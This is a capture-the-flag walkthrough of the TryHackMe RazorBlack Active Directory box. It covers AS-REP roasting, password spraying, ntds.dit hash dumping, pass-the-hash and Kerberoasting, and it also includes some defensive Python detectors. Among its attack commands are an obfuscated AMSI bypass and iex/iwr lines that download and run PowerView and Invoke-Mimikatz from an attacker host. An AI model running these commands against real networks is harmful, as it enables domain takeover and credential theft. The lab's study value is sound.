Disclaimer

The hosts attacked in this article are legally authorized targets. The tools and methods described are for learning and exchange only. Do not use the tools and the attack ideas shown here for any illegal purpose. I am not responsible for any consequences arising from this, nor for any misuse or damage caused.

Service detection

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# nmap -sV -Pn 10.10.246.88
Starting Nmap ( https://nmap.org ) at 2022-03-02 01:48 EST
Nmap scan report for 10.10.246.107
Host is up (0.23s latency).
Not shown: 986 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-02 06:49:52Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC Over HTTP 1.0
636/tcp  open  tcpwrapped
2049/tcp open  mountd        1-3 (RPC #100005)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 252.05 seconds

Enumeration

enum4linux confirms the domain; its DNS name should be raz0rblack.thm:

Domain Name: RAZ0RBLACK
Domain Sid: S-1-5-21-3403444377-2687699443-13012745

Enumerate the NFS exports

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# showmount -e 10.10.246.107
Export list for 10.10.246.107:
/users (everyone)

Mount the remote export on a local directory

mount -t nfs 10.10.246.107:/users /mnt/share -o nolock

There are two files:

┌──(root💀kali)-[/mnt/share]
└─# ls
employee_status.xlsx  sbradley.txt

Copy the files to the local machine and view their contents.

sbradley.txt contains Steven's flag:

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# cat sbradley.txt
THM{ab53e05c9a98def00314a14ccbfa8104}

employee_status.xlsx lists Ljudmila Vetrova as the DA (Active Directory admin):

HAVEN SECRET HACKER'S CLUB

Name              Role
----              ----
daven port        CTF PLAYER
imogen royce      CTF PLAYER
tamara vidal      CTF PLAYER
arthur edwards    CTF PLAYER
carl ingram       CTF PLAYER (INACTIVE)
nolan cassidy     CTF PLAYER
reza zaydan       CTF PLAYER
ljudmila vetrova  CTF PLAYER, DEVELOPER, ACTIVE DIRECTORY ADMIN
rico delgado      WEB SPECIALIST
tyson williams    REVERSE ENGINEERING
steven bradley    STEGO SPECIALIST
chamber lin       CTF PLAYER (INACTIVE)

Build a username list user.txt from the roster (first initial + surname, the convention sbradley.txt already hints at):

dport
iroyce
tvidal
aedwards
cingram
ncassidy
rzaydan
lvetrova
rdelgado
twilliams
sbradley
clin

Enumerate users with Kerberos pre-authentication disabled (GetNPUsers.py)

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py raz0rblack.thm/ -usersfile /root/tryhackme/RazorBlack/user.txt -dc-ip 10.10.246.107
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User lvetrova doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$twilliams@RAZ0RBLACK.THM:6d5f254f2b01b68443e01ac503a2ed67$bd6fadd530655734b4c85557dea62332df6604adef3cc68742b422b989df3073a8590f6fdf9b1ff84a7f401560d303f3e9a43ebce53c9a5530a9a7180e48e2dcf094b6088013000db177e67cc41ccdf9f94d20480a860cbc943fe0d89e1bc7a237c9754d4987f643f923be5b29f2f2dd2b2f96ef916d2450d2b2a5232c60f693065e299cf93efb6a4d3c23e31d40392e8271289c1765beebebc777aa1befb1acf7fabe45a6d9ecd0b92720c84db10178ca0838414cbcb551cc45b5682732ffb1561d6fed3e3959167ff4793dac3bf9046abff4e0e65621398bdb5df010df1e7e62a282a79f753321983d4910d39537f1
[-] User sbradley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

This yields an AS-REP hash for twilliams (the encrypted part of the TGT reply, which john loads as krb5asrep).

Crack it with John

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
roastpotatoes    ($krb5asrep$23$twilliams@RAZ0RBLACK.THM)
1g 0:00:00:06 DONE (2022-03-02) 0.1623g/s 685381p/s 685381c/s 685381C/s Rob3560..roastedfish
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We now have one set of user credentials:

twilliams:roastpotatoes

Enumerate SMB

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# smbmap -u "twilliams" -p "roastpotatoes" -H 10.10.246.107
[+] IP: 10.10.246.107:445   Name: raz0rblack.thm
        Disk        Permissions   Comment
        ----        -----------   -------
        ADMIN$      NO ACCESS     Remote Admin
        C$          NO ACCESS     Default share
        IPC$        READ ONLY     Remote IPC
        NETLOGON    READ ONLY     Logon server share
        SYSVOL      READ ONLY     Logon server share
        trash       NO ACCESS     Files Pending for deletion

Spray the password

Spray the same password against the usernames collected above:

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# crackmapexec smb 10.10.246.107 -u user.txt -p pass.txt
SMB  10.10.246.107  445  HAVEN-DC  [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB  10.10.246.107  445  HAVEN-DC  [-] raz0rblack.thm\dport:roastpotatoes STATUS_LOGON_FAILURE
SMB  10.10.246.107  445  HAVEN-DC  [-] raz0rblack.thm\iroyce:roastpotatoes STATUS_LOGON_FAILURE
SMB  10.10.246.107  445  HAVEN-DC  [-] raz0rblack.thm\tvidal:roastpotatoes STATUS_LOGON_FAILURE
SMB  10.10.246.107  445  HAVEN-DC  [-] raz0rblack.thm\aedwards:roastpotatoes STATUS_LOGON_FAILURE
SMB  10.10.246.107  445  HAVEN-DC  [-] raz0rblack.thm\cingram:roastpotatoes STATUS_LOGON_FAILURE
SMB  10.10.246.107  445  HAVEN-DC  [-] raz0rblack.thm\ncassidy:roastpotatoes STATUS_LOGON_FAILURE
SMB  10.10.246.107  445  HAVEN-DC  [-] raz0rblack.thm\rzaydan:roastpotatoes STATUS_LOGON_FAILURE
SMB  10.10.246.107  445  HAVEN-DC  [-] raz0rblack.thm\lvetrova:roastpotatoes STATUS_LOGON_FAILURE
SMB  10.10.246.107  445  HAVEN-DC  [-] raz0rblack.thm\rdelgado:roastpotatoes STATUS_LOGON_FAILURE
SMB  10.10.246.107  445  HAVEN-DC  [-] raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE

One credential pair fails only because the account must change its password:

sbradley:roastpotatoes
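What this spray looks like from the domain controller's side, as an added example that is not part of the original writeup: one source tries one password against many accounts in a few seconds, and the sbradley failure (STATUS_PASSWORD_MUST_CHANGE, NTSTATUS 0xC0000224) proves the password was right even though the logon failed. The event lines below are constructed in a simplified "time source account sub-status" form, not a real Windows 4625 export; the sub-status codes are the documented ones.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (not real logs): simplified Windows 4625 logon failures,
# one per line: <time> <source IP> <target account> <NTSTATUS sub-status>.
# 0xC000006A = wrong password, 0xC0000224 = password correct but must be
# changed (reported above by crackmapexec as STATUS_PASSWORD_MUST_CHANGE).
SAMPLE_EVENTS = """\
2022-03-02T06:55:01 10.0.0.50 dport    0xC000006A
2022-03-02T06:55:02 10.0.0.50 iroyce   0xC000006A
2022-03-02T06:55:02 10.0.0.50 tvidal   0xC000006A
2022-03-02T06:55:03 10.0.0.50 aedwards 0xC000006A
2022-03-02T06:55:03 10.0.0.50 cingram  0xC000006A
2022-03-02T06:55:04 10.0.0.50 ncassidy 0xC000006A
2022-03-02T06:55:04 10.0.0.50 rzaydan  0xC000006A
2022-03-02T06:55:05 10.0.0.50 lvetrova 0xC000006A
2022-03-02T06:55:05 10.0.0.50 rdelgado 0xC000006A
2022-03-02T06:55:06 10.0.0.50 sbradley 0xC0000224
2022-03-02T07:10:00 10.0.0.77 lvetrova 0xC000006A
2022-03-02T07:10:30 10.0.0.77 lvetrova 0xC000006A
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(0x[0-9A-Fa-f]{8})$")
# Failures that nevertheless prove the submitted password was correct.
PASSWORD_OK_STATUSES = {"0xC0000224"}


def parse_events(text):
    """Parse the sample format into (time, source_ip, account, status) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            status = "0x" + m.group(4)[2:].upper()
            events.append((datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), status))
    return events


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Flag each source that fails against >= min_accounts distinct accounts
    inside one window. Many accounts with few tries each is the spray
    signature; many tries against one account is brute force, not flagged here."""
    by_source = defaultdict(list)
    for ev in events:
        by_source[ev[1]].append(ev)
    alerts = {}
    for src, evs in by_source.items():
        evs.sort()
        best = 0
        for i, (t0, _, _, _) in enumerate(evs):
            accounts = {acct for t, _, acct, _ in evs[i:] if t - t0 <= window}
            best = max(best, len(accounts))
        if best >= min_accounts:
            alerts[src] = {
                "distinct_accounts": best,
                # accounts whose password the sprayer evidently got right
                "password_was_valid": sorted({acct for _, _, acct, st in evs
                                              if st in PASSWORD_OK_STATUSES}),
            }
    return alerts


if __name__ == "__main__":
    for src, info in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(f"spray from {src}: {info['distinct_accounts']} accounts, "
              f"valid password for {info['password_was_valid']}")
```

The window and account threshold are the tuning knobs: a sprayer that spaces attempts out over hours to stay under the lockout threshold needs a wider window, at the cost of more noise from legitimate shared hosts such as proxies.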

Set a new password with smbpasswd.py

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# python3 /root/impacket/examples/smbpasswd.py raz0rblack.thm/sbradley:roastpotatoes@10.10.246.107 -newpass 'newpassword123'
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation

[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.

Listing the SMB shares again, sbradley has read permission on trash:

┌──(root💀kali)-[~/tryhackme/trash]
└─# smbmap -u "sbradley" -p "newPassword123" -H 10.10.246.88
[+] IP: 10.10.246.107:445   Name: 10.10.246.107
        Disk        Permissions   Comment
        ----        -----------   -------
        ADMIN$      NO ACCESS     Remote Admin
        C$          NO ACCESS     Default share
        IPC$        READ ONLY     Remote IPC
        NETLOGON    READ ONLY     Logon server share
        SYSVOL      READ ONLY     Logon server share
        trash       READ ONLY     Files Pending for deletion

View the shared files

┌──(root💀kali)-[~/tryhackme/trash]
└─# smbclient -U 'sbradley%newPassword123' \\\\10.10.246.88\\trash
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Mar 16 02:01:28 2021
  ..                                  D        0  Tue Mar 16 02:01:28 2021
  chat_log_20210222143423.txt         A     1340  Thu Feb 25 14:29:05 2021
  experiment_gone_wrong.zip           A 18927164  Tue Mar 16 02:02:20 2021
  sbradley.txt                        A       37  Sat Feb 27 14:24:21 2021

chat_log_20210222143423.txt

┌──(root💀kali)-[~/tryhackme/trash]
└─# cat chat_log_20210222143423.txt
sbradley> Hey Administrator our machine has the newly disclosed vulnerability for Windows Server 2019.
Administrator> What vulnerability??
sbradley> That new CVE-2020-1472 which is called ZeroLogon has released a new PoC.
Administrator> I have given you the last warning. If you exploit this on this Domain Controller as you did previously on our old Ubuntu server with dirtycow, I swear I will kill your WinRM-Access.
sbradley> Hey you won't believe what I am seeing.
Administrator> Now, don't say that you ran the exploit.
sbradley> Yeah, The exploit works great it needs nothing like credentials. Just give it IP and domain name and it resets the Administrator pass to an empty hash.
sbradley> I also used some tools to extract ntds.dit and SYSTEM.hive and transferred it into my box. I love running secretsdump.py on those files and dumped the hash.
Administrator> I am feeling like a new cron has been issued in my body named heart attack which will be executed within the next minute.
Administrator> But, Before I die I will kill your WinRM access..........
sbradley> I have made an encrypted zip containing the ntds.dit and the SYSTEM.hive and uploaded the zip inside the trash share.
sbradley> Hey Administrator are you there ...
sbradley> Administrator .....
The administrator died after this incident. Press F to pay respects

The zip is password-protected: convert it into a hash John can read with zip2john, then crack it with John.

┌──(root💀kali)-[~/tryhackme/trash]
└─# /usr/sbin/zip2john experiment_gone_wrong.zip > zip.hash
ver 2.0 efh 5455 efh 7875 experiment_gone_wrong.zip/system.hive PKZIP Encr: TS_chk, cmplen=2941739, decmplen=16281600, crc=BDCCA7E2 ts=591C cs=591C type=8
ver 2.0 efh 5455 efh 7875 experiment_gone_wrong.zip/ntds.dit PKZIP Encr: TS_chk, cmplen=15985077, decmplen=58720256, crc=68037E87 ts=5873 cs=5873 type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
electromagnetismo (experiment_gone_wrong.zip)
1g 0:00:00:01 DONE (2022-03-02 04:27) 0.5882g/s 4929Kp/s 4929Kc/s 4929KC/s ELFO2009..elboty2009
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The zip password is electromagnetismo.

Check the extracted files

┌──(root💀kali)-[~/tryhackme/RazorBlack/experiment_gone_wrong]
└─# ls
ntds.dit  system.hive

ntds.dit is a binary file on a domain controller: it is the main Active Directory database, stored at %SystemRoot%\NTDS\ntds.dit.

In short, it is the AD database.

Use secretsdump.py to extract the credentials from ntds.dit. There is a lot of output, so redirect it into a new file, user.hash:

python /root/impacket-master/examples/secretsdump.py -ntds ./ntds.dit -system ./system.hive LOCAL > user.hash

Looking at this file, the NTLM hashes of the domain users appear:

┌──(root💀kali)-[~/tryhackme/RazorBlack/experiment_gone_wrong]
└─# head -n 20 user.hash
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x17a0a12951d502bb3c14cf1d495a71ad
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 84bf0a79cd645db4f94b24c35cfdf7c7
[*] Reading and decrypting hashes from ./ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1afedc472d0fdfe07cd075d36804efd0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HAVEN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:4ea59b8f64c94ec66ddcfc4e6e5899f9:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:703a365974d7c3eeb80e11dd27fb0cb3:::
<skip>

Reduce this file to a list containing only the NT hashes, one per line, for example:

1afedc472d0fdfe07cd075d36804efd0
31d6cfe0d16ae931b73c59d7e0c089c0
4ea59b8f64c94ec66ddcfc4e6e5899f9
...
<skip>
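The reduction described above, plus the checks a reviewer of such a dump would run, as an added example that is not part of the original writeup: it parses secretsdump's `user:rid:lmhash:nthash:::` records, emits the NT-hash-only list, and flags empty passwords, LM hashes that are still stored, and NT hashes shared by several accounts (password reuse). The first four records are the ones shown above; the svc_demo record is constructed to illustrate reuse.

```python
from collections import defaultdict

# Well-known constants: the LM hash stored when no LM hash exists, and the
# NT hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Four records from the dump above plus one constructed account (svc_demo)
# that shares the Administrator's NT hash.
SAMPLE_DUMP = r"""[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Reading and decrypting hashes from ./ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1afedc472d0fdfe07cd075d36804efd0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HAVEN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:4ea59b8f64c94ec66ddcfc4e6e5899f9:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:703a365974d7c3eeb80e11dd27fb0cb3:::
raz0rblack.thm\svc_demo:1200:aad3b435b51404eeaad3b435b51404ee:1afedc472d0fdfe07cd075d36804efd0:::
"""


def parse_secretsdump(text):
    """Return (account, rid, lmhash, nthash) for every NTLM record.
    Status lines ([*]), Kerberos key lines and cleartext lines have a
    different field count and are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("["):
            continue
        parts = line.split(":")
        # account:rid:lm:nt::: -> exactly 7 fields, three of them empty trailers
        if len(parts) != 7 or not parts[1].isdigit():
            continue
        account, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        records.append((account, rid, lm, nt))
    return records


def nt_hash_list(records):
    """The NT-hash-only list the writeup builds by hand (deduplicated, order kept)."""
    hashes = []
    for _, _, _, nt in records:
        if nt not in hashes:
            hashes.append(nt)
    return hashes


def audit(records):
    """Findings as (accounts, issue) pairs."""
    findings = []
    by_nt = defaultdict(list)
    for account, _, lm, nt in records:
        by_nt[nt].append(account)
        if nt == EMPTY_NT:
            findings.append((account, "empty password"))
        if lm != EMPTY_LM:
            findings.append((account, "LM hash stored (trivially crackable)"))
    for nt, accounts in by_nt.items():
        if nt != EMPTY_NT and len(accounts) > 1:
            findings.append((", ".join(accounts), "same NT hash: password reuse"))
    return findings


if __name__ == "__main__":
    recs = parse_secretsdump(SAMPLE_DUMP)
    print("\n".join(nt_hash_list(recs)))
    for who, issue in audit(recs):
        print(f"{who}: {issue}")
```

Running the hash list through crackmapexec as the writeup does is then one step; the audit output is what a defender would hand back after an assessment, since identical NT hashes mean identical passwords across accounts.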

Then spray the hashes with the following command

crackmapexec smb 10.10.246.107 -u /root/tryhackme/RazorBlack/user.txt -H user.hash

This gives one valid hash:

lvetrova:f220d3988deb3f516c73f40ee16c431d

Pass the hash

Log in with evil-winrm to get a foothold

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# evil-winrm -i 10.10.246.107 -u lvetrova -H f220d3988deb3f516c73f40ee16c431d

Evil-WinRM shell v3.2

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\lvetrova\Documents> whoami
raz0rblack\lvetrova

Get the first user flag with the following two commands

*Evil-WinRM* PS C:\Users\lvetrova> $Credential = Import-Clixml -Path "lvetrova.xml"
*Evil-WinRM* PS C:\Users\lvetrova> $Credential.GetNetworkCredential().password
THM{694362e877adef0d85a92e6d17551fe4}

Privilege escalation

Bypass the PowerShell execution policy

$env:PSExecutionPolicyPreference="bypass"

Bypass AMSI

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ([TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE (('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(("{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Load PowerView, SharpHound and Invoke-Mimikatz from the attacker's web server directly into the target's memory

iex (iwr -UseBasicParsing http://10.11.63.196/PowerView.ps1)
iex (iwr -UseBasicParsing http://10.11.63.196/SharpHound.ps1)
iex (iwr -UseBasicParsing http://10.11.63.196/Invoke-Mimikatz.ps1)

BloodHound shows that xyan1d3 can log in to the DC remotely, is a Kerberoastable user, and belongs to the Backup Operators group, which makes it a valuable target.

View the users that have an SPN

*Evil-WinRM* PS C:\Users\lvetrova\Documents> Get-NetUser -spn | select userprincipalname,serviceprincipalname

userprincipalname      serviceprincipalname
-----------------      --------------------
                       kadmin/changepw
xyan1d3@raz0rblack.thm HAVEN-DC/xyan1d3.raz0rblack.thm:60111

xyan1d3 has an SPN, so request its service ticket with GetUserSPNs.py

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# python3 /root/impacket/examples/GetUserSPNs.py raz0rblack.thm/lvetrova -hashes f220d3988deb3f516c73f40ee16c431d:f220d3988deb3f516c73f40ee16c431d -outputfile hash.txt
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

ServicePrincipalName                   Name     MemberOf                                                    PasswordLastSet             LastLogon  Delegation
-------------------------------------  -------  ----------------------------------------------------------  --------------------------  ---------  ----------
HAVEN-DC/xyan1d3.raz0rblack.thm:60111  xyan1d3  CN=Remote Management Users,CN=Builtin,DC=raz0rblack,DC=thm  2021-02-23 10:17:17.715160  <never>
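Both Kerberos weaknesses used on this box, pre-authentication disabled on twilliams (the GetNPUsers.py step earlier) and an SPN on xyan1d3 (the GetUserSPNs.py step just above), are visible in plain user attributes before anyone roasts them. The following audit is an added example, not part of the original writeup: it applies the documented userAccountControl and msDS-SupportedEncryptionTypes bit values to user records that are constructed here to mirror the accounts in the writeup, and it also rates the impact the way BloodHound did (privileged group membership, remote logon rights). The records would come from an LDAP query in practice; the group names and the "password never expires" flag are the reviewer's ranking, not anything the box enforces.

```python
# Documented userAccountControl bits
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000      # the flag GetNPUsers.py tests for

# msDS-SupportedEncryptionTypes bits; unset (None/0) means RC4 is still accepted,
# which is why john loaded an "etype 23" (RC4) ticket below.
ENC_RC4_HMAC = 0x4
ENC_AES128 = 0x8
ENC_AES256 = 0x10

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators",
                     "Backup Operators", "Account Operators", "Server Operators"}
REMOTE_ACCESS_GROUPS = {"Remote Management Users", "Remote Desktop Users"}


def group_names(member_of):
    """'CN=Backup Operators,CN=Builtin,DC=raz0rblack,DC=thm' -> 'Backup Operators'."""
    names = []
    for dn in member_of:
        rdn = dn.split(",")[0]
        if rdn.upper().startswith("CN="):
            names.append(rdn[3:])
    return names


def roasting_exposure(user):
    """Return human-readable findings for one user object (empty list = clean)."""
    uac = user.get("userAccountControl", 0)
    if uac & UF_ACCOUNTDISABLE:
        return []       # a disabled account cannot be roasted (still worth cleaning up)
    findings = []
    if uac & UF_DONT_REQUIRE_PREAUTH:
        findings.append("AS-REP roastable: Kerberos pre-authentication not required")
    if user.get("servicePrincipalName"):
        enc = user.get("msDS-SupportedEncryptionTypes")
        if not enc or enc & ENC_RC4_HMAC:
            findings.append("Kerberoastable with RC4 (etype 23) service tickets")
        else:
            findings.append("Kerberoastable, AES-only tickets (far slower to crack)")
    if not findings:
        return []
    # Rate the impact only for accounts that are actually exposed.
    groups = set(group_names(user.get("memberOf", [])))
    if groups & PRIVILEGED_GROUPS:
        findings.append("high value: member of " + ", ".join(sorted(groups & PRIVILEGED_GROUPS)))
    if groups & REMOTE_ACCESS_GROUPS:
        findings.append("can log on remotely: " + ", ".join(sorted(groups & REMOTE_ACCESS_GROUPS)))
    if uac & UF_DONT_EXPIRE_PASSWD:
        findings.append("password never expires")
    return findings


def audit_users(users):
    """Map sAMAccountName -> findings for every exposed account."""
    report = {}
    for user in users:
        findings = roasting_exposure(user)
        if findings:
            report[user["sAMAccountName"]] = findings
    return report


BUILTIN = "CN=Builtin,DC=raz0rblack,DC=thm"
# Constructed records; attribute values are illustrative, not pulled from the box.
SAMPLE_USERS = [
    {"sAMAccountName": "twilliams",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "xyan1d3",
     "userAccountControl": UF_NORMAL_ACCOUNT,
     "servicePrincipalName": ["HAVEN-DC/xyan1d3.raz0rblack.thm:60111"],
     "memberOf": ["CN=Remote Management Users," + BUILTIN, "CN=Backup Operators," + BUILTIN]},
    {"sAMAccountName": "lvetrova",
     "userAccountControl": UF_NORMAL_ACCOUNT,
     "memberOf": ["CN=Domain Admins,CN=Users,DC=raz0rblack,DC=thm"]},
    {"sAMAccountName": "svc_old",      # disabled: SPN present but not roastable
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE,
     "servicePrincipalName": ["HTTP/old.raz0rblack.thm"]},
]

if __name__ == "__main__":
    for name, findings in audit_users(SAMPLE_USERS).items():
        print(name)
        for finding in findings:
            print("  -", finding)
```

The fixes follow directly from the findings: clear the pre-authentication flag, move service accounts with SPNs to long random passwords (or group managed service accounts), set AES-only encryption types on them, and keep them out of groups like Backup Operators.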

Crack it with John

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cyanide9amine5628 (?)
1g 0:00:00:05 DONE (2022-03-02 09:41) 0.1748g/s 1550Kp/s 1550Kc/s 1550KC/s cybermilk0..cy2802341
Use the "--show" option to display all of the cracked passwords reliably
Session completed

cyanide9amine5628 is the plaintext password of xyan1d3.

Log in:

evil-winrm -i 10.10.246.107 -u xyan1d3 -p cyanide9amine5628

Get the second user flag with the following two commands

*Evil-WinRM* PS C:\Users\xyan1d3> $Credential = Import-Clixml -Path "xyan1d3.xml"
*Evil-WinRM* PS C:\Users\xyan1d3> $Credential.GetNetworkCredential().password
LOL here it is -> THM{62ca7e0b901aa8f0b233cade0839b5bb}

View the current user's privileges

*Evil-WinRM* PS C:\Users\xyan1d3> whoami /all

USER INFORMATION
----------------

User Name          SID
================== ============================================
raz0rblack\xyan1d3 S-1-5-21-3403444377-2687699443-13012745-1106

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

SeBackupPrivilege and SeRestorePrivilege

HackTricks describes SeBackupPrivilege as follows:

